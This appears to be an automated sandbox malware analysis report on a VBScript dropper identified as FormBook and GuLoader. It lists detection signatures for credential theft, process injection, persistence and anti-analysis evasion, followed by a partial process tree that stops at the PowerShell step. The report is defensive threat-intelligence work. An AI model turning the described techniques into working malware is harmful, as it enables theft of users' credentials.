Windows
Analysis Report
01105751.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5176 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01105751.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- PING.EXE (PID: 4340 cmdline: ping google.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- PING.EXE (PID: 6704 cmdline: ping %.%.%.% MD5: 2F46799D79D22AC72C241EC0322B011D)
- conhost.exe (PID: 2436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3224 cmdline: C:\Windows\system32\cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 5692 cmdline: